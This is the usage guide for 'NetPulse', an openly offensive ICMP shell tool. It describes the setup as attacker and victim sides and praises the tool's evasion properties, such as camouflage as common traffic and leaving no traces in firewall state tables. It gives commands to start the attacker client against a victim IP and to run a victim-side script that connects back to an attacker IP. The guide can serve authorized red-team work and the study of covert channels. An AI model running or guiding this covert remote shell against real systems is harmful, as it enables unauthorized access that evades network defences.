NetPulse is an ICMP SHELL tool that does not require root access on the victim's side. This guide provides detailed information on how to use NetPulse.
- No Root Access Required: NetPulse eliminates the need for root access on the victim's side.
- Camouflage: ICMP traffic is common and often allowed in networks and firewalls.
- Reduced Visibility: ICMP messages leave no traces in the state tables of most firewalls.
- Useful in Restrictive Networks: In networks where TCP or UDP traffic is strictly controlled, ICMP can be an alternative.
- Limited Shell: NetPulse provides a limited and non-interactive shell.
- Uncommon Traffic: Traffic generated by NetPulse can be detected by intrusion detection systems.
- High Latency: Compared to a reverse shell, NetPulse is much slower.
Attacker-side configuration is more complex and requires root access. Follow the steps below:
To disable the kernel's automatic ping response, use the -s flag:
$ sudo python3 netpulse.py -s
If you want to enable it again, you can use the same option. This change is not permanent and will revert to the default upon system restart.
To start the client, execute the netpulse.py file with root permissions:
$ sudo python3 netpulse.py -i <interface> <victim-IP>For more options, use the -h flag:
$ python3 netpulse.py -hVictim-side configuration is simpler and does not require root access. Ensure that the following tools are installed:
- iputils-ping - Tool for testing the reachability of network hosts.
- xxd - Tool for creating (or reversing) a hexadecimal dump.
If all the necessary tools are installed, run the servnp.sh file:
$ chmod +x servnp.sh && ./servnp.sh <attacker-IP>
